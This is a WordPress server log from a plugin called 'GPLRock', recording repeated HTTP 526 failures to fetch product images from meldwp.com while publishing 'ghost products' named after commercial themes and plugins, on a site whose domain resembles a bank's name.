GPLRock WARNING: Ghost product published WITHOUT image - Product ID: argenta-creative-multipurpose-wordpress-theme [05-Apr-2026 06:04:45 UTC] GPLRock: Image download failed for product moustachey-a-blog-theme-with-extra-gusto (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:47 UTC] GPLRock: Image download failed for product moustachey-a-blog-theme-with-extra-gusto (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moustachey-a-blog-theme-with-extra-gusto-22959.webp for product moustachey-a-blog-theme-with-extra-gusto after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:49 UTC] GPLRock: Image download failed for product moustachey-a-blog-theme-with-extra-gusto (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:51 UTC] GPLRock: Image download failed for product moustachey-a-blog-theme-with-extra-gusto (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moustachey-a-blog-theme-with-extra-gusto-22959.webp for product moustachey-a-blog-theme-with-extra-gusto after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:53 UTC] GPLRock WARNING: Image download failed for product moustachey-a-blog-theme-with-extra-gusto. URL: https://meldwp.com/wp-content/uploads/moustachey-a-blog-theme-with-extra-gusto-22959.webp [05-Apr-2026 06:04:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moustachey-a-blog-theme-with-extra-gusto [05-Apr-2026 06:04:54 UTC] GPLRock: Image download failed for product olida-creative-parallax-one-page-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:56 UTC] GPLRock: Image download failed for product olida-creative-parallax-one-page-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/olida---creative-parallax-one-page-wp-theme-20607.webp for product olida-creative-parallax-one-page-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:58 UTC] GPLRock: Image download failed for product olida-creative-parallax-one-page-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:00 UTC] GPLRock: Image download failed for product olida-creative-parallax-one-page-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/olida---creative-parallax-one-page-wp-theme-20607.webp for product olida-creative-parallax-one-page-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:02 UTC] GPLRock WARNING: Image download failed for product olida-creative-parallax-one-page-wp-theme. URL: https://meldwp.com/wp-content/uploads/olida---creative-parallax-one-page-wp-theme-20607.webp [05-Apr-2026 06:05:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: olida-creative-parallax-one-page-wp-theme [05-Apr-2026 06:05:02 UTC] GPLRock: Image download failed for product touchup-cosmetic-and-plastic-surgery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:05 UTC] GPLRock: Image download failed for product touchup-cosmetic-and-plastic-surgery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/touchup---cosmetic-and-plastic-surgery-wordpress-theme-446.webp for product touchup-cosmetic-and-plastic-surgery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:07 UTC] GPLRock: Image download failed for product touchup-cosmetic-and-plastic-surgery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:09 UTC] GPLRock: Image download failed for product touchup-cosmetic-and-plastic-surgery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/touchup---cosmetic-and-plastic-surgery-wordpress-theme-446.webp for product touchup-cosmetic-and-plastic-surgery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:11 UTC] GPLRock WARNING: Image download failed for product touchup-cosmetic-and-plastic-surgery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/touchup---cosmetic-and-plastic-surgery-wordpress-theme-446.webp [05-Apr-2026 06:05:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: touchup-cosmetic-and-plastic-surgery-wordpress-theme [05-Apr-2026 06:05:11 UTC] GPLRock: Image download failed for product novetty-powerful-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:13 UTC] GPLRock: Image download failed for product novetty-powerful-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/novetty--powerful-woocommerce-theme-26004.webp for product novetty-powerful-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:15 UTC] GPLRock: Image download failed for product novetty-powerful-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:17 UTC] GPLRock: Image download failed for product novetty-powerful-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/novetty--powerful-woocommerce-theme-26004.webp for product novetty-powerful-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:20 UTC] GPLRock WARNING: Image download failed for product novetty-powerful-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/novetty--powerful-woocommerce-theme-26004.webp [05-Apr-2026 06:05:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: novetty-powerful-woocommerce-theme [05-Apr-2026 06:05:20 UTC] GPLRock: Image download failed for product polyphonic-music-band-artist-musician-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:22 UTC] GPLRock: Image download failed for product polyphonic-music-band-artist-musician-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/polyphonic---music-band-artist--musician-wordpress-theme-7378.webp for product polyphonic-music-band-artist-musician-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:24 UTC] GPLRock: Image download failed for product polyphonic-music-band-artist-musician-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:26 UTC] GPLRock: Image download failed for product polyphonic-music-band-artist-musician-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:05:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/polyphonic---music-band-artist--musician-wordpress-theme-7378.webp for product polyphonic-music-band-artist-musician-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:05:28 UTC] GPLRock WARNING: Image download failed for product polyphonic-music-band-artist-musician-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/polyphonic---music-band-artist--musician-wordpress-theme-7378.webp [05-Apr-2026 06:05:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: polyphonic-music-band-artist-musician-wordpress-theme [05-Apr-2026 06:06:23 UTC] GPLRock: Image download failed for product cryptocurrency-search-addon-for-crypto-plugins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:25 UTC] GPLRock: Image download failed for product cryptocurrency-search-addon-for-crypto-plugins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptocurrency-search-addon-for-crypto-plugins-26234.webp for product cryptocurrency-search-addon-for-crypto-plugins after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:06:27 UTC] GPLRock: Image download failed for product cryptocurrency-search-addon-for-crypto-plugins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:30 UTC] GPLRock: Image download failed for product cryptocurrency-search-addon-for-crypto-plugins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptocurrency-search-addon-for-crypto-plugins-26234.webp for product cryptocurrency-search-addon-for-crypto-plugins after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:06:32 UTC] GPLRock WARNING: Image download failed for product cryptocurrency-search-addon-for-crypto-plugins. URL: https://meldwp.com/wp-content/uploads/cryptocurrency-search-addon-for-crypto-plugins-26234.webp [05-Apr-2026 06:06:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptocurrency-search-addon-for-crypto-plugins [05-Apr-2026 06:06:32 UTC] GPLRock: Image downloaded successfully for product woocommerce-bookings-exporter-download-csv-pdf-or-email-reports (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0356fbc.webp [05-Apr-2026 06:06:32 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bookings-exporter-download-csv-pdf-or-email-reports: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0356fbc.webp [05-Apr-2026 06:06:32 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bookings-exporter-download-csv-pdf-or-email-reports [05-Apr-2026 06:06:32 UTC] GPLRock: Image download failed for product woocommerce-attribute-stock-shared-stock-variable-quantities (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:34 UTC] GPLRock: Image download failed for product woocommerce-attribute-stock-shared-stock-variable-quantities (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-attribute-stock--shared-stock--variable-quantities-28062.webp for product woocommerce-attribute-stock-shared-stock-variable-quantities after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:06:36 UTC] GPLRock: Image download failed for product woocommerce-attribute-stock-shared-stock-variable-quantities (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:38 UTC] GPLRock: Image download failed for product woocommerce-attribute-stock-shared-stock-variable-quantities (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:06:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-attribute-stock--shared-stock--variable-quantities-28062.webp for product woocommerce-attribute-stock-shared-stock-variable-quantities after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:06:40 UTC] GPLRock WARNING: Image download failed for product woocommerce-attribute-stock-shared-stock-variable-quantities. URL: https://meldwp.com/wp-content/uploads/woocommerce-attribute-stock--shared-stock--variable-quantities-28062.webp [05-Apr-2026 06:06:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-attribute-stock-shared-stock-variable-quantities [05-Apr-2026 06:06:40 UTC] GPLRock: Image download failed for product voicer-text-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:33 UTC] GPLRock: Image download failed for product wordpress-dynamic-keyword-insertion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:35 UTC] GPLRock: Image download failed for product wordpress-dynamic-keyword-insertion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-dynamic-keyword-insertion-25137.webp for product wordpress-dynamic-keyword-insertion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:16:37 UTC] GPLRock: Image download failed for product wordpress-dynamic-keyword-insertion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:39 UTC] GPLRock: Image download failed for product wordpress-dynamic-keyword-insertion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-dynamic-keyword-insertion-25137.webp for product wordpress-dynamic-keyword-insertion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:16:41 UTC] GPLRock WARNING: Image download failed for product wordpress-dynamic-keyword-insertion. URL: https://meldwp.com/wp-content/uploads/wordpress-dynamic-keyword-insertion-25137.webp [05-Apr-2026 06:16:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-dynamic-keyword-insertion [05-Apr-2026 06:16:41 UTC] GPLRock: Image download failed for product multisaas-multi-tenancy-multipurpose-website-builder-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:43 UTC] GPLRock: Image download failed for product multisaas-multi-tenancy-multipurpose-website-builder-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multisaas---multi-tenancy-multipurpose-website-builder-saas-12669.webp for product multisaas-multi-tenancy-multipurpose-website-builder-saas after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:16:46 UTC] GPLRock: Image download failed for product multisaas-multi-tenancy-multipurpose-website-builder-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:48 UTC] GPLRock: Image download failed for product multisaas-multi-tenancy-multipurpose-website-builder-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/multisaas---multi-tenancy-multipurpose-website-builder-saas-12669.webp for product multisaas-multi-tenancy-multipurpose-website-builder-saas after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:16:50 UTC] GPLRock WARNING: Image download failed for product multisaas-multi-tenancy-multipurpose-website-builder-saas. URL: https://meldwp.com/wp-content/uploads/multisaas---multi-tenancy-multipurpose-website-builder-saas-12669.webp [05-Apr-2026 06:16:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: multisaas-multi-tenancy-multipurpose-website-builder-saas [05-Apr-2026 06:16:50 UTC] GPLRock: Image download failed for product beyond-multisite-utilities-for-wordpress-network-admins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:52 UTC] GPLRock: Image download failed for product beyond-multisite-utilities-for-wordpress-network-admins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beyond-multisite---utilities-for-wordpress-network-admins-17342.webp for product beyond-multisite-utilities-for-wordpress-network-admins after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:16:54 UTC] GPLRock: Image download failed for product beyond-multisite-utilities-for-wordpress-network-admins (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:56 UTC] GPLRock: Image download failed for product beyond-multisite-utilities-for-wordpress-network-admins (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:16:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beyond-multisite---utilities-for-wordpress-network-admins-17342.webp for product beyond-multisite-utilities-for-wordpress-network-admins after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:16:58 UTC] GPLRock WARNING: Image download failed for product beyond-multisite-utilities-for-wordpress-network-admins. URL: https://meldwp.com/wp-content/uploads/beyond-multisite---utilities-for-wordpress-network-admins-17342.webp [05-Apr-2026 06:16:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: beyond-multisite-utilities-for-wordpress-network-admins [05-Apr-2026 06:16:59 UTC] GPLRock: Image download failed for product mynx-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:01 UTC] GPLRock: Image download failed for product mynx-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mynx-addons-for-elementor-12351.webp for product mynx-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:03 UTC] GPLRock: Image download failed for product mynx-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:05 UTC] GPLRock: Image download failed for product mynx-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mynx-addons-for-elementor-12351.webp for product mynx-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:07 UTC] GPLRock WARNING: Image download failed for product mynx-addons-for-elementor. URL: https://meldwp.com/wp-content/uploads/mynx-addons-for-elementor-12351.webp [05-Apr-2026 06:17:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mynx-addons-for-elementor [05-Apr-2026 06:17:07 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-plugin-responsive (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:09 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-plugin-responsive (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordion-faq-wordpress-plugin-responsive-18871.webp for product accordion-faq-wordpress-plugin-responsive after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:11 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-plugin-responsive (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:14 UTC] GPLRock: Image download failed for product accordion-faq-wordpress-plugin-responsive (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordion-faq-wordpress-plugin-responsive-18871.webp for product accordion-faq-wordpress-plugin-responsive after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:16 UTC] GPLRock WARNING: Image download failed for product accordion-faq-wordpress-plugin-responsive. URL: https://meldwp.com/wp-content/uploads/accordion-faq-wordpress-plugin-responsive-18871.webp [05-Apr-2026 06:17:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: accordion-faq-wordpress-plugin-responsive [05-Apr-2026 06:17:16 UTC] GPLRock: Image download failed for product sliders-tabs-toggles-wpbakery-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:18 UTC] GPLRock: Image download failed for product sliders-tabs-toggles-wpbakery-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sliders-tabs-toggles---wpbakery-addons-17616.webp for product sliders-tabs-toggles-wpbakery-addons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:20 UTC] GPLRock: Image download failed for product sliders-tabs-toggles-wpbakery-addons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:22 UTC] GPLRock: Image download failed for product sliders-tabs-toggles-wpbakery-addons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sliders-tabs-toggles---wpbakery-addons-17616.webp for product sliders-tabs-toggles-wpbakery-addons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:24 UTC] GPLRock WARNING: Image download failed for product sliders-tabs-toggles-wpbakery-addons. URL: https://meldwp.com/wp-content/uploads/sliders-tabs-toggles---wpbakery-addons-17616.webp [05-Apr-2026 06:17:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sliders-tabs-toggles-wpbakery-addons [05-Apr-2026 06:17:24 UTC] GPLRock: Image download failed for product wordpress-woocommerce-product-compare-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:27 UTC] GPLRock: Image download failed for product wordpress-woocommerce-product-compare-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-product-compare-plugin-9212.webp for product wordpress-woocommerce-product-compare-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:29 UTC] GPLRock: Image download failed for product wordpress-woocommerce-product-compare-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:31 UTC] GPLRock: Image download failed for product wordpress-woocommerce-product-compare-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-product-compare-plugin-9212.webp for product wordpress-woocommerce-product-compare-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:33 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-product-compare-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-product-compare-plugin-9212.webp [05-Apr-2026 06:17:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-product-compare-plugin [05-Apr-2026 06:17:33 UTC] GPLRock: Image download failed for product progress-map-list-filter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:35 UTC] GPLRock: Image download failed for product progress-map-list-filter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/progress-map-list--filter---wordpress-plugin-18939.webp for product progress-map-list-filter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:37 UTC] GPLRock: Image download failed for product progress-map-list-filter-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:39 UTC] GPLRock: Image download failed for product progress-map-list-filter-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/progress-map-list--filter---wordpress-plugin-18939.webp for product progress-map-list-filter-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:42 UTC] GPLRock WARNING: Image download failed for product progress-map-list-filter-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/progress-map-list--filter---wordpress-plugin-18939.webp [05-Apr-2026 06:17:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: progress-map-list-filter-wordpress-plugin [05-Apr-2026 06:17:42 UTC] GPLRock: Image download failed for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:44 UTC] GPLRock: Image download failed for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/listdom-pro--business-directory-and-classified-ads-listings-wordpress-plugin-18371.webp for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:46 UTC] GPLRock: Image download failed for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:48 UTC] GPLRock: Image download failed for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/listdom-pro--business-directory-and-classified-ads-listings-wordpress-plugin-18371.webp for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:50 UTC] GPLRock WARNING: Image download failed for product listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/listdom-pro--business-directory-and-classified-ads-listings-wordpress-plugin-18371.webp [05-Apr-2026 06:17:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: listdom-pro-business-directory-and-classified-ads-listings-wordpress-plugin [05-Apr-2026 06:17:50 UTC] GPLRock: Image download failed for product argus-social-media-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:53 UTC] GPLRock: Image download failed for product argus-social-media-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/argus--social-media-wordpress-plugin-27972.webp for product argus-social-media-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:55 UTC] GPLRock: Image download failed for product argus-social-media-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:57 UTC] GPLRock: Image download failed for product argus-social-media-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:17:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/argus--social-media-wordpress-plugin-27972.webp for product argus-social-media-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:17:59 UTC] GPLRock WARNING: Image download failed for product argus-social-media-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/argus--social-media-wordpress-plugin-27972.webp [05-Apr-2026 06:17:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: argus-social-media-wordpress-plugin [05-Apr-2026 06:18:51 UTC] GPLRock: Image download failed for product gym-gym-fitness-wordpress-theme-hercules-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:18:53 UTC] GPLRock: Image download failed for product gym-gym-fitness-wordpress-theme-hercules-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:18:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gym--gym-fitness-wordpress-theme--hercules-rtl-27190.webp for product gym-gym-fitness-wordpress-theme-hercules-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:18:55 UTC] GPLRock: Image download failed for product gym-gym-fitness-wordpress-theme-hercules-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:18:57 UTC] GPLRock: Image download failed for product gym-gym-fitness-wordpress-theme-hercules-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:18:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gym--gym-fitness-wordpress-theme--hercules-rtl-27190.webp for product gym-gym-fitness-wordpress-theme-hercules-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:18:59 UTC] GPLRock WARNING: Image download failed for product gym-gym-fitness-wordpress-theme-hercules-rtl. URL: https://meldwp.com/wp-content/uploads/gym--gym-fitness-wordpress-theme--hercules-rtl-27190.webp [05-Apr-2026 06:18:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gym-gym-fitness-wordpress-theme-hercules-rtl [05-Apr-2026 06:18:59 UTC] GPLRock: Image download failed for product phly-versatile-coming-soon-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:02 UTC] GPLRock: Image download failed for product phly-versatile-coming-soon-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phly---versatile-coming-soon-template-3984.webp for product phly-versatile-coming-soon-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:04 UTC] GPLRock: Image download failed for product phly-versatile-coming-soon-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:06 UTC] GPLRock: Image download failed for product phly-versatile-coming-soon-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/phly---versatile-coming-soon-template-3984.webp for product phly-versatile-coming-soon-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:08 UTC] GPLRock WARNING: Image download failed for product phly-versatile-coming-soon-template. URL: https://meldwp.com/wp-content/uploads/phly---versatile-coming-soon-template-3984.webp [05-Apr-2026 06:19:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: phly-versatile-coming-soon-template [05-Apr-2026 06:19:08 UTC] GPLRock: Image download failed for product citrus-one-page-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:10 UTC] GPLRock: Image download failed for product citrus-one-page-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:19:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/citrus---one-page-wordpress-21233.webp for product citrus-one-page-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:19:12 UTC] GPLRock: Image download failed for product citrus-one-page-wordpress (attempt 1/3). HTTP Code: 526, Error: . 